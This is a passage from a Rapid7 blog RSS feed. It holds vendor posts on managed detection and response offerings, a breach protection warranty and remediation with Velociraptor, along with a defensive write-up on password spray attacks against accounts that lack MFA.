ransomware groups over the last couple of years.</p><p>The manufacturing industry is an attack vector for nation states because it is an important component of global trade. It is also an area that has many legacy and older, operational technologies (OT). Combine unpatched legacy systems with complicated supply chains, and you have a risk that nation state actors will find an attractive target. This is especially the case when considering that many manufacturing organizations have critical contracts with governments, and attacks can cause severe disruption if they're not speedily resolved.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda1d60075c388deb/6847f61eb0379166eb2b5097/blog-incidentfindings-6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-6.png" asset-alt="blog-incidentfindings-6.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda1d60075c388deb/6847f61eb0379166eb2b5097/blog-incidentfindings-6.png" data-sys-asset-uid="bltda1d60075c388deb" data-sys-asset-filename="blog-incidentfindings-6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-6.png" sys-style-type="display"/></p><h2>Conclusion</h2><p>Q1 2025 resembles a refinement of successful tactics, as opposed to brand new innovations brought to the table. Our Q1 ransomware analytics showed threat actors making streamlined tweaks to a well-oiled machine, and we find many of the same “evolution, not revolution” patterns occurring here.<br/><br/>This progression is particularly applicable in the case of initial access via valid accounts with no MFA protection. We expect to see no drop in popularity while businesses continue to leave easy inroads open and available to skilled (and unskilled) attackers.<br/><br/>In addition, the risk of severe compromise stemming from seemingly harmless online searches underscores the necessity for organizations to reexamine basic security best practices, alongside deploying robust detection and response capabilities. Businesses addressing these key areas for concern will be better equipped to defend against what should not be an inevitable slide into data exfiltration and malware deployment.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/06/04/rapid7-q1-2025-incident-response-findings</link>
      <guid isPermaLink="false">bltf348c1c0cc36ee71</guid>
      <category><![CDATA[Incident Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Chris Boyd]]></dc:creator>
      <pubDate>Wed, 04 Jun 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb655c1b69f13c73b/6846a711536b63f12ca5f649/incident-response-findings-2025.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Seeing Is Securing: How Surface Command Expands MDR Visibility and Impact]]></title>
      <description><![CDATA[<p>Imagine hiring a professional security team to guard your home — only to discover they’re doing so by monitoring camera feeds from only the front of the house — securing the front door but blissfully unaware of the unlocked window in the back. That’s what many organizations face today when relying on Managed Detection and Response (MDR) services without full visibility across their digital environments.</p><p>Shadow IT, orphaned assets, internet-facing exposures, and unmanaged cloud services are all part of an expanding attack surface. And, according to Enterprise Strategy Group, 76% of organizations have experienced some type of cyberattack involving an unknown or unmanaged internet-facing asset(1) — the kind of risk that stems from gaps in visibility. The result? A critical mismatch between the Attack Surface (what adversaries can reach) and the <a href="https://www.rapid7.com/fundamentals/what-is-the-detection-surface/">Detection Surface</a> (what MDR services are configured to see and respond to).</p><p>To maximize the effectiveness of security operations, MDR must continually evolve. Today at Rapid7, that means integrating <a href="https://www.rapid7.com/products/command/attack-surface-management-asm/">Surface Command</a> — not as a dashboard or tool to manage, but as a behind-the-scenes capability that strengthens the service our customers rely on.</p><h2>Extending the detection surface</h2><p>Surface Command enhances the MDR experience by combining two critical perspectives:</p><ol><li>CAASM (<a href="https://www.rapid7.com/fundamentals/what-is-cyber-asset-attack-surface-management-caasm/">Cyber Asset Attack Surface Management</a>) consolidates insights from across internal tooling — vulnerability management platforms, EDR, identity systems, IT service management, firewalls, and more.</li><li>EASM (<a href="https://www.rapid7.com/fundamentals/external-attack-surface-management-easm/">External Attack Surface Management</a>) complements this by continuously scanning for exposed infrastructure: domains, APIs, IPs, ports, and services.</li></ol><p>Together, they offer a complete picture of what’s actually in your environment — and what’s at risk — without requiring additional effort from security teams. For the Rapid7 SOC, this means less risk for blind spots and faster, more confident investigations. For customers, it means fewer RFIs and greater trust in the response process.</p><h2>Bridging the visibility gap</h2><p>Many organizations today rely on spreadsheets and manual processes to keep track of their infrastructure — and the consequences are significant. Incomplete inventories, inconsistent classifications, and missed configuration details all contribute to increased risk and slower response.</p><p>Surface Command addresses this with three key strengths:</p><ul><li><strong>Complete inventory</strong>: Using API-based integrations with common security and IT operations tools, Surface Command automatically discovers and classifies a broad set of internal and internet-facing assets — from cloud environments to endpoint platforms, firewall configurations, and vulnerability management tools. This removes the guesswork and closes visibility gaps.</li><li><strong>Continuous insight</strong>: Visibility isn’t a one-time event. Surface Command continuously monitors for new assets and changes to existing ones, ensuring the customer and the SOC always have a current picture of what exists and how it’s exposed.</li><li><strong>Automated efficiency</strong>: By eliminating the need for manual tracking and inventory upkeep, Surface Command frees security teams to focus on higher-value priorities. One customer shared that this capability helped eliminate nearly 100 hours of manual asset tracking per month — time they redirected toward strategic initiatives.</li></ul><p>These operational advantages translate directly into security value: better data, faster detection and investigation, and a more resilient managed defense.</p><h2>Enabling a smarter MDR experience</h2><p>Visibility is a means to an end. By enabling Surface Command, the MDR SOC has invaluable insight into every corner of your security environment, bringing efficiencies and deep insights to your managed security program:</p><ul><li><strong>Earlier awareness during onboarding</strong>: Our SOC gets a complete picture of the customer environment right away, which means we can begin protecting it more effectively from day one.</li><li><strong>More context during incidents</strong>: When a detection triggers on a previously unknown asset, the SOC isn’t starting from zero. Surface Command provides the information needed to understand what a system is, who owns it, and how it’s configured.</li><li><strong>Stronger foundation for threat hunting</strong>: For teams that want to lean into proactive defense, Surface Command gives the context needed to ask better questions — and find better answers.</li></ul><p>It also supports compliance initiatives by clarifying what’s in scope and how it’s protected. For organizations pursuing NIST, CIS, or ISO alignment, that transparency can be a game changer.</p><h2>Making Attack Surface Management more accessible than ever</h2><p>Surface Command brings the power of <a href="https://www.rapid7.com/fundamentals/attack-surface-management/">Attack Surface Management</a> — long seen as a capability reserved for mature, well-resourced security teams — directly into the hands of Rapid7 MDR customers. Our goal is to ensure that your internal security team and our SOC are given the most complete context possible from day one.</p><p><strong>There are a number of ways Surface Command is available to MDR customers today. Contact your Rapid7 account team or </strong><a href="https://www.rapid7.com/products/command/attack-surface-management-asm/trial/"><strong>click here</strong></a><strong> to initiate a no commitment trial today.</strong></p><p>(1) Enterprise Strategy Group</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/05/30/seeing-is-securing-how-surface-command-expands-mdr-visibility-and-impact</link>
      <guid isPermaLink="false">blt02a22625fd1d9cb2</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Conner Goldstein]]></dc:creator>
      <pubDate>Fri, 30 May 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30cad4cead79d2d3/6846a7113860835cfa35e65d/surface-command.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Reinforcing resilience with financial assurance: Breach protection matters now more than ever]]></title>
      <description><![CDATA[<h3>Introducing Rapid7’s value-added Breach Protection Warranty that delivers confidence, clarity, and coverage when it matters most.</h3><p>Life’s old adage often applies in security: <em>Hope for the best, prepare for the worst</em>. In today’s threat landscape, even the best-prepared organizations can’t guarantee immunity from cyberattacks. The cost of a breach is no longer just a line item—it’s a business risk with board-level visibility. In 2024, the average total cost of a breach soared to <strong>$4.88 million</strong>, a record high and a 10% increase from the previous year​.1</p><p>As threats grow in complexity and breach response becomes more expensive and unpredictable, security leaders aren’t just investing in detection and response—they’re looking for assurance that they are, in fact, prepared for the worst. That’s why Rapid7 is introducing its <strong>Breach Protection Warranty</strong>: real-world financial coverage, built directly into our flagship <a href="/services/managed-detection-and-response-mdr/">Managed Detection and Response (MDR)</a> offering, Managed Threat Complete Ultimate. This coverage is designed to give customers confidence that if that dreaded day comes, they’re ready.</p><p>Rapid7 continues to invest heavily in this industry-leading service—trusted by thousands of customers worldwide—which processes trillions of events and investigates millions of alerts annually. Leveraging this immense scale to ensure robust threat detection and rapid response, the results speak for themselves: 99.6% of our MDR customers remain unaffected by ransomware. But beyond numbers, our commitment is clear—we’re dedicated to continuously enhancing MDR capabilities and standing shoulder-to-shoulder with our customers to safeguard their operations.</p><h2>Built-in financial protection, when it counts</h2><p>The Rapid7 Breach Protection Warranty provides up to $1 million in breach-related coverage, based on the size of a customer’s environment. It’s designed to offset the real-world costs organizations face in the wake of a cyberattack, including:</p><ul><li>Forensic investigation expenses</li><li>Legal consultation fees</li><li>Public relations costs</li><li>Post-security incident expenses</li></ul><p>Unlike standalone breach coverage or third-party insurance policies, this warranty comes at no additional cost to eligible customers. There are no upsells or hidden fees—just value-added protection that’s already embedded in the service​.</p><h2>Integrated into a world-class detection and response program</h2><p>Rapid7’s holistic and outcome-driven approach to detection and response includes unlimited digital forensics and incident response (DFIR), remote containment, and active remediation of commodity malware. All of these capabilities are amplified by the Rapid7 Command Platform, which seamlessly integrates vulnerability findings and threat intelligence to deliver complete coverage across the entire security incident lifecycle.</p><p>Together with the Breach Protection Warranty, this cohesive model transforms your cybersecurity program into one not just backed by technology and expertise, but also a financial safety net built into the service.</p><h2>Simplifying breach response, not complicating it</h2><p>A warranty is, at its core, a legal agreement—and it’s understandable that many come with conditions or “strings attached.” Some require customers to exhaust other forms of insurance before coverage kicks in. Others recapture the financial benefit through billable incident response services, which can quietly reduce the actual value received.</p><p>Rapid7 takes a different approach. We’ve built the Breach Protection Warranty to maximize customer value with transparency. There are no hidden clauses designed to funnel reimbursement back to us. And because unlimited incident response (IR) is already included in the service, customers don’t need to worry about separate IR contracts or an unexpected changing of the guard in the frenetic aftermath of an incident​.</p><h2>Strengthening resilience through readiness</h2><p>While financial protection is the headline, eligibility for the warranty reinforces the fundamentals of a strong security posture. Customers must meet a set of best-practice requirements that align with Rapid7’s proven approach to resilience, including but not limited to:</p><ul><li>Hardened endpoint configurations</li><li>Deployment of core protection modules such as Ransomware Prevention</li><li>Updated, compliant operating systems and software across covered assets​</li></ul><p>These aren’t just checkboxes—they’re meaningful controls that improve visibility, reduce risk, and better prepare customers to prevent and respond to threats; with the added benefit of unlocking a meaningful financial backstop.</p><h2>Ready to learn more?</h2><p>This is about more than cost coverage. It’s about trust—trust that your security investments are driving true resilience and that your provider is prepared to stand beside you when it matters most.</p><p>Rapid7’s Breach Protection Warranty is now available to all Managed Threat Complete Ultimate customers. To learn more about your eligibility or sign up, please reach out to your Rapid7 account team.</p><p></p><p><em>1 </em><a href="https://www.ibm.com/reports/data-breach"><em>IBM</em></a></p><p><br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/29/reinforcing-resilience-with-financial-assurance-breach-protection-matters-now-more-than-ever</link>
      <guid isPermaLink="false">bltd4ac6f4388938091</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Managed Threat Complete]]></category><dc:creator><![CDATA[Cindy Stanton]]></dc:creator>
      <pubDate>Tue, 29 Apr 2025 12:45:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8ac880c3a8a1c69a/683ddf0b18a5534ca2686f87/gettyimages-2192283021.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Deepening the MDR partnership: Rapid7 now delivers Active Remediation with Velociraptor]]></title>
      <description><![CDATA[<h3>Rapid7 is expanding its response capabilities to meet the demands and relentless pace of today’s threat landscape – and the operational needs of our customers.</h3><p>Partnership means many things to us here at Rapid7. It means showing up with trusted expertise, providing clear guidance in moments of uncertainty, and helping security teams stay ahead of ever-evolving threats. Most of all, we see partnership as foundational to building security resilience – and that requires not only a proactive,  risk-aware mindset but also the capability to respond when the inevitable happens.</p><p>As attacks grow faster, more complex, and more persistent, the need for decisive, transparent remediation has become more urgent – some estimates place the average time-to-ransom at just 16.88 hours1 –  with that kind of speed, every moment matters. We pride our Managed Detection and Response (MDR) service on delivering best-in-class detection, investigation, and actionable response guidance. Now, we are evolving that partnership – and the strength of your security program – even further.</p><h2>Introducing Active Remediation with Velociraptor</h2><p>Powered by our best-in-class, open-source digital forensics and incident response (DFIR) tool, Rapid7 MDR analysts can take direct, approved remediation actions on your behalf – removing malware, terminating rogue processes, and restoring system integrity while minimizing the need to reimage affected endpoints unless it’s truly required. Every action is executed with precision, transparency, and within clearly defined boundaries.</p><p>This is more than a new capability. It’s a reflection of our commitment to move in lockstep with you – not just at the point of detection, but all the way through to resolution. From unlimited incident response support to deeply collaborative investigations and tailored recommendations, Rapid7 has always prioritized being hands-on when you need us most. Active Remediation with Velociraptor extends that same principle to the final – and often most difficult – step: taking action on your behalf to eradicate threats.</p><h2>Delivered with Precision, Transparency, and Trust</h2><p>Active Remediation with Velociraptor is designed not just to take action, but to take the right action, the right way. Every remediation workflow is executed by Rapid7’s expert analysts using Velociraptor’s purpose-built query language (VQL) – a DFIR language engineered for precision, traceability, and scale. This allows the analyst to target specific artifacts, processes, and configurations – avoiding the blunt-force actions that often lead to full endpoint reimaging.</p><ul><li><strong>You stay in control</strong> – Remediation is performed based on clearly defined and approved scopes and parameters aligned to your security policies.</li><li><strong>You see what we do</strong> – Every action is logged, auditable, and built using readable logic within Velociraptor, with full visibility provided through detailed post-incident reports.</li><li><strong>You gain precision without disruption</strong> – Remove only what’s malicious and reverse unauthorized configurations without pulling systems offline or fully reimaging machines.</li></ul><h2>Rapid7’s New Response Workflow</h2><img src="/content/images/2025/04/Screenshot-2025-04-28-at-9.43.18-AM.png" width="auto" style="width: auto; height: auto;" /><ol><li><strong>Alert detection:</strong> Identify malicious activity across customer endpoints and network.</li><li><strong>Active Response:</strong> Quarantine affected endpoints to stem the spread of the attack.</li><li><strong>Rapid7 investigation:</strong> SOC validates threat, determines scope, and develops response plan.</li><li><strong>Active Remediation with Velociraptor:</strong> Rapid7 analysts remove malicious artifacts with precision.</li><li><strong>Mitigation guidance: </strong>Recommendations to help your team prevent threat reemergence.</li></ol><h2>Remediating in the Real World</h2><p>Our approach brings analyst-led, logic-driven remediation into live environments – solving the post-containment challenges security teams face every day. Unlike session-based access that relies on endpoints being on and connected to the internet, Rapid7 are delivering remediation that meets the auditability, practicality, and scalability needs of the real world:</p><ul><li><strong>Targeted threat removal without reimaging: </strong>Identify and remove only malicious artifacts – files, processes, persistence mechanisms, or unauthorized configurations – linked to a confirmed threat.</li><li><strong>	Outcome: </strong>Your endpoints stay online and productive, while the threat is neutralized with minimal disruption. Avoiding unnecessary reimaging means faster recovery, reduced IT workload, and less downtime for end users.</li><li><strong>Controlled execution with transparent logic</strong><strong>: </strong>Every remediation workflow is written in VQL – visible and reviewable by customers before deployment. There’s no scripting or ‘trust us’ execution.</li><li><strong>	Outcome: </strong>Builds trust and accountability into the remediation process. You get full visibility into every action, supporting compliance requirements and reducing uncertainty in regulated environments.</li><li><strong>Distributed remediation across endpoints: </strong>When multiple endpoints are compromised by a single campaign – such as credential theft malware – we will queue high-fidelity remediation workflows across many machines simultaneously – even if some are offline.</li><li><strong>	Outcome: </strong>Lays the foundation for consistent threat removal across your environment without manual intervention or system-by-system cleanup. This enables a timely, coordinated response that keeps pace with fast-moving attacks.</li><li><strong>Reducing friction between security and IT teams</strong><br/>Rather than working through lengthy remediation steps with your IT team, we execute the most critical actions directly – within approved scope – and document every step.	</li><li><strong>	Outcome:</strong> Fewer delays and less back-and-forth between teams. With Rapid7 handling the complete, end-to-end lifecycle of an alert, internal teams stay focused on business priorities, knowing remediation is being executed safely and effectively.</li></ul><h2>Setting the stage for remediation with Active Response</h2><p>Remediation begins with strategic containment and detailed investigation. Rapid7’s Active Response enables rules-based quarantining of affected endpoints in the immediate aftermath of a credible threat detection. This stops lateral movement before it begins and preserves the system state for investigation.</p><p>Active Remediation builds directly on this foundation. By first containing the threat, we can then investigate confidently and move quickly to identify and remove malicious artifacts – mitigating the risk of reinfection or spread. The integrated workflow – from containment to investigation to remediation – helps ensure our response is not only fast, but precise.</p><p>Together, Active Response and Active Remediation form the cornerstone of a continuous response pipeline that reduces attacker dwell time, limits impact, and restores normal operations faster.</p><h2>Unlimited incident response – now deeper than ever</h2><p>Rapid7 MDR customers have long relied on Rapid7’s unlimited DFIR support to guide them through the most critical moments of a threat. That hands-on expertise – delivered without surprise fees, hourly caps, or the need to navigate third-party providers and tools – is a defining part of how we ensure customers receive the fastest, most comprehensive response possible.</p><p>Active Remediation builds on that foundation by closing the final gap in the response lifecycle. Where detection, containment, and investigation have long been Rapid7’s strengths, we can now fully execute on the next step: resolving the threat. This combination of expert-led triage with decisive, hands-on remediation, delivers a more unified, end-to-end response – minimizing delays, reducing reliance on your internal resources, and accelerating your path to recovery. It’s not just about reacting faster – it’s about responding smarter, start to finish.</p><h2>More than a capability – it’s a commitment</h2><p>The <a href="/services/managed-detection-and-response-mdr/">Rapid7 MDR service</a> has always been built around standing shoulder to shoulder with our customers, especially when it matters most. As we expand this partnership through the finale of the detection and response lifecycle – taking action to remove threats, reduce disruption, and accelerate recovery – we do it with the same transparency, accountability, and respect for your control that defines every part of the Rapid7 experience. In the name of building true security resilience, partnership doesn’t end with guidance – it means staying with you all the way through to resolution. Active Remediation with Velociraptor is in closed early access and will roll out to MDR customers in mid-May. To learn more, please contact your account team or Cybersecurity Advisor.</p><p></p><p><em>1 </em><a href="https://gbhackers.com/ransomware-gangs-encrypt-systems/"><em>gbhackers</em></a><br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/29/deepening-the-mdr-partnership-rapid7-now-delivers-active-remediation-with-velociraptor</link>
      <guid isPermaLink="false">blt270538a69579c2ca</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Velociraptor]]></category><dc:creator><![CDATA[Conner Goldstein]]></dc:creator>
      <pubDate>Tue, 29 Apr 2025 12:35:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb2ca1bfd93386107/683de131543b8d5a7bbf11d4/gettyimages-2209566971.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[THE NEW Rapid7 MDR for Enterprise: Tailored Detection and Response for Complex Environments]]></title>
      <description><![CDATA[<p>Complex ecosystems. Custom applications. Specialized log sources. Distributed operations. Enterprise security leaders aren’t just defending against threats—they’re navigating a fragmented environment where visibility, coverage, and coordination are constant challenges.</p><p>Our MDR service provides powerful protection for thousands of organizations worldwide today. But as enterprise environments grow more distributed and unique, many security teams find themselves needing something more flexible—something that can be tightly aligned to their internal workflows, toolsets, and detection strategies.</p><p>That’s why we’re excited to introduce <a href="/services/managed-detection-and-response-mdr/enterprise/">Rapid7 MDR for Enterprise</a>—a fully managed, customized detection and response service designed to meet the complexity of the modern enterprise head-on.</p><h2>Tailored Coverage to Extend Your Existing Security Program</h2><p>MDR for Enterprise builds on the proven foundation of Rapid7’s MDR, layering on advanced customization and collaboration to meet highly specific enterprise needs:</p><ul><li><strong>Custom Event Source Integration:</strong> Extend visibility to proprietary, vertical-specific, or legacy technologies that standard integrations don’t cover.</li><li><strong>Bring Your Own Logs</strong>: Monitor your own log sources, working with our Detection Engineering team to optimize signal fidelity and context.</li><li><strong>Tailored Detection Engineering:</strong> Rapid7 Detection Engineers design and tune detection rules that reflect your actual environment—not a theoretical model​.</li></ul><h3>Designed to Meet You Where You Are</h3><p>Enterprise environments rarely look the same. Some rely on legacy infrastructure alongside modern cloud stacks. Others have industry-specific applications or internally developed tools that aren’t covered by typical MDR integrations. And many are already investing in their own detections or bringing in telemetry from a wide range of tools.</p><p>MDR for Enterprise is built to adapt to this complexity. It allows customers to bring their own log sources and extend monitoring into non-standard systems. Whether it's a homegrown application or a niche vertical-specific tool, we’ll build the integration and align detection logic to your context—not the other way around.</p><h3>More Than a Vendor. A True Operational Partner.</h3><p>One of the biggest differences with MDR for Enterprise is how we collaborate. This isn’t a black-box service or a reactive alert-forwarding engine. We work alongside your internal team to co-develop incident response protocols and continuous tuning cycles.</p><p>We’re not just another SOC you plug into—we’re a strategic extension of your security program. Through tightly integrated processes and regular reviews, your team and ours operate as one. That operational interlock ensures context is never lost, alerts are always actionable, and response is always aligned to your priorities.</p><h3>Elevating the Tools You Already Trust</h3><p>Enterprise security teams have made serious investments—in technology, in detection engineering, in internal processes. We’re not here to disrupt that. MDR for Enterprise is designed to enhance your existing ecosystem, not replace it.</p><p>We will partner with you to develop a custom monitoring solution for your business critical applications to meet your specific security uses cases  —from triage, to investigation, and response through our global SOC. This approach improves your ROI and creates a seamless bridge between your team’s internal expertise and our operational scale.</p><h2>Enterprise-Ready, Without the Tradeoffs</h2><p>With MDR for Enterprise, you don’t have to choose between visibility and control, speed and customization, or scale and support. You get a partner that understands enterprise complexity—and builds a service around it.</p><p>Ready to explore what tailored MDR could look like for your team? Reach out to the team or head to <a href="/services/managed-detection-and-response-mdr/enterprise/">Rapid7 MDR for Enterprise</a> to learn more.</p><p><br/></p><p><br/></p><p><br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/24/the-new-rapid7-mdr-for-enterprise-tailored-detection-and-response-for-complex-environments</link>
      <guid isPermaLink="false">blte030f65a75922fe5</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[C.J. Spallitta]]></dc:creator>
      <pubDate>Thu, 24 Apr 2025 13:45:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b140436b26d15ee/683ddebc590d7f636ede1b00/gettyimages-2193672854.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Password Spray Attacks Taking Advantage of Lax MFA]]></title>
      <description><![CDATA[<p>In the first quarter of 2025, Rapid7’s Managed Threat Hunting team observed a significant volume of brute-force password attempts leveraging FastHTTP, a high-performance HTTP server and client library for Go, to automate unauthorized logins via HTTP requests.</p><p>This rapid volume of credential spraying was primarily designed to discover and compromise accounts not properly secured by multi-factor authentication (MFA). Out of just over a million unauthorized login attempts we observed, the distribution of originating traffic sources is similar to that <a href="https://www.bleepingcomputer.com/news/security/hackers-use-fasthttp-in-new-high-speed-microsoft-365-password-attacks/">previously seen</a> in January 2025. Some of the most prominent nations serving as points of origin for these attempts are as follows:</p><ul><li><strong>Brazil</strong>: 70%</li><li><strong>Venezuela</strong>: 3%</li><li><strong>Turkey</strong>: 3%</li><li><strong>Russia</strong>: 2%</li><li><strong>Argentina</strong>: 2%</li><li><strong>Mexico</strong>: 2%</li></ul><p>Analysis of attempted initial access via compromised or absent MFA revealed a significant success rate for defenders’ security controls. Overwhelmingly, 73% of attempts resulted in account lockouts, with an additional 26% failing due to incorrect passwords. Account disabling accounted for 1% of failures. Critically, fewer than 1% of accounts were successfully compromised through brute-force attacks, highlighting the robust effectiveness of implemented credential brute-forcing prevention measures.</p><p>There is a heavy emphasis here on rapid-fire, repeated attempts to log in resulting in accounts eventually being locked. The small number of accounts being disabled could be an additional security step after too many attempts to log in, or simply that the person associated with the account has left the organization.<br/><br/>The misuse of FastHTTP to automate unauthorized logins at speed is just one aspect of a much broader problem: namely, the popularity of initial access to networks aided by a persistent lack of MFA for VPN, SaaS, and VDI products. Rapid7 expects to see this type of rapid-fire, brute force attack become more common as cloud authentication becomes more prevalent. It’s entirely possible threat actors will look to try similar account compromising attempts with other tools and libraries, and commonly abused user agent strings.</p><h2>Incident Response Facts and Figures: Handing Attackers an Easy Victory</h2><p>Rapid7 has consistently highlighted MFA as a primary concern across several threat research reports. By the <a href="/blog/post/2023/08/17/rapid7s-mid-year-threat-review/">midpoint of 2023</a>, data for the first half of the year showed that 39% of incidents our managed services teams responded to had arisen from lax or lacking MFA. Our <a href="/blog/post/2024/12/16/2024-threat-landscape-statistics-ransomware-activity-vulnerability-exploits-and-attack-trends">2024 Threat Landscape</a> blog highlighted that remote access to systems without MFA was responsible for 56% of incidents as an initial access vector, the largest driver of incidents overall.<br/><br/>The third quarter of 2024 saw 67% of incident responses involving abuse of valid accounts and missing or lax enforcement of MFA. This total sits at 57% for Q4 2024, in part because of a 22% increase in social engineering. Even without pausing to consider user agent-centric password spraying, this is a potentially dangerous combination for organizations not making the most of MFA-centric protection. If the brute forcing doesn’t get you, a <a href="/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/">social engineering campaign might just do the trick</a>.</p><h2>Why MFA Matters: The Consequences of “We’ll Set It up Later”</h2><p>MFA is a key component of an overall <a href="/fundamentals/iam-identity-and-access-management/">Identity Access Management (IAM)</a> strategy. If you’re not making use of it, then your overall defense is weakened against many of the most common threats out there, including:</p><ul><li><a href="/fundamentals/phishing-attacks/"><strong>Phishing</strong></a>: The very best password you can muster is made entirely redundant if your employee hands it over to a phisher, whether via a forged website or a social engineering attack. One way to mitigate against this is to use a password manager, which will only automatically enter your details on a valid website. But what happens if your password manager’s master password is compromised, and all the logins contained within are exposed? One of the best ways to address this additional headache is MFA for all your accounts, including your password manager.<br/></li><li><a href="/fundamentals/malware-attacks/"><strong>Malware</strong></a>: Do you know what malware, password stealers, and keyloggers, love more than anything else? Grabbing all of those passwords stored in web browsers, or (in more serious cases) plain text files on the desktop and email drafts. Do you know what they don’t like? Having all of those perilous passwords protected with an additional layer of security. MFA could make the difference between compromise and data exfiltration versus, a last-minute save and a security training refresher.<br/><br/><strong>Credential stuffing</strong>: An unfortunate by-product of years of data breaches (often with phishing as the launchpad), roll-ups of new and ancient login details published online are a constant threat. It’s worth noting that it isn't just your current employees who could be on these lists—ex-employees with valid credentials are a cause for concern too.</li></ul><h2>Recommendations from Rapid7’s MDR and IR Experts</h2><p>Here are some steps you can take now to improve your security posture and mitigate risk from attacks like these, courtesy of Rapid7’s MDR and IR experts:</p><ul><li>Implement multi-factor authentication (MFA) across all account types, including default, local, domain, and cloud accounts, to prevent unauthorized access, even if credentials are compromised.<br/></li><li>Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.<br/></li><li>Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).<br/></li><li>Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. These audits should also include if default accounts have been enabled, or if new local accounts are created that have not been authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.<br/></li><li>Regularly audit user accounts for activity and deactivate or remove any that are no longer needed.<br/></li><li>Whenever possible and aligned with business requirements, disable legacy authentication for non-service accounts and users relying on it. Legacy authentication, which does not support MFA, should be <a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/block-legacy-authentication">replaced with modern authentication protocols</a>.<br/></li><li>Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.</li></ul><h2>You can’t go wrong with MFA</h2><p>Imagine a scenario where your network is under fire from a worryingly high number of brute force attempts from across the globe, targeting your insecure accounts until just one is compromised. Now imagine that same scenario where everything is blocked by default, regional restrictions are applied, logins from user agents aren’t allowed, and all of your VPNs, your RDP, VDIs, and SaaS tools are secured with MFA.</p><p>This may feel like an overreaction to what you may view as an attack that looks like an edge case; however, consider that ransomware groups, alongside more commonly found malware authors and phishers, will <em>also</em> find you a significantly harder target to break as a result of these countermeasures being put in place. Please don’t end up in the inevitable percentage of organizations compromised due to missing MFA in our next threat research report; there’s no better time than now to think about building out a stronger security posture.<br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/10/password-spray-attacks-taking-advantage-of-lax-mfa</link>
      <guid isPermaLink="false">bltd647c69cac7f7281</guid>
      <category><![CDATA[Detection and Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Chris Boyd]]></dc:creator>
      <pubDate>Thu, 10 Apr 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5d4660074ed5c0dc/683de4b2abf2ad6b273c4517/gettyimages-2084264422.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[What’s New in Rapid7 Products & Services: Q1 2025 in Review]]></title>
      <description><![CDATA[<p>At Rapid7, we started off the year focused on delivering new features and advancements across our products and services to bring you the context needed to prioritize exposures, visualize your attack surface, and accelerate incident response. Read on for Q1 2025 release highlights across the Command Platform, from <a href="/products/command/exposure-management/">Exposure Command</a> to <a href="/services/managed-detection-and-response-mdr/">Managed Threat Complete</a>.</p><h2>Eliminate blind spots with Exposure Management</h2><h3>Discover and protect sensitive data across hybrid environments</h3><p>Keeping sensitive data secure across hybrid and multi-cloud environments isn’t easy—especially without clear visibility. Data gets misplaced, duplicated, or left exposed, making risk assessment and compliance difficult. <a href="/blog/post/2025/02/25/uncovering-and-protecting-sensitive-data-across-cloud-environments-with-exposure-command/">Sensitive Data Discovery</a>, our latest feature delivering clarity and control to your security data, can help.</p><p>Available as part of  Exposure Command and <a href="/products/insightcloudsec/">InsightCloudSec</a>, Sensitive Data Discovery gives security teams real-time visibility into sensitive data, such as PII, financial data or customer records, across multi-cloud environments, helping identify exposures, prioritize risks, and take action faster. </p><p>With automated scanning and classification, you can pinpoint who has access to sensitive data, continuously monitor for exposures, and strengthen compliance while streamlining incident response. Learn more Sensitive Data Discovery  <a href="/blog/post/2025/02/25/uncovering-and-protecting-sensitive-data-across-cloud-environments-with-exposure-command/">here</a>.</p><figure><img src="/content/images/2025/03/Screenshot-2025-03-31-at-9.41.33-AM.png" captionAttrs="[object Object]" caption="Sensitive Data Discovery in InsightCloudSec" width="auto" style="width: auto; height: auto;" /><figcaption>Sensitive Data Discovery in InsightCloudSec</figcaption></figure><h3>Intelligent vulnerability prioritization with AI-driven CVSS Scoring</h3><p>In February 2024, the National Vulnerability Database (NVD) stopped providing CVSS scores for all CVEs, creating a gap in risk assessment as vulnerabilities go unscored. To bridge this gap, we’ve introduced AI-Generated Risk Scoring in Exposure Command, which uses 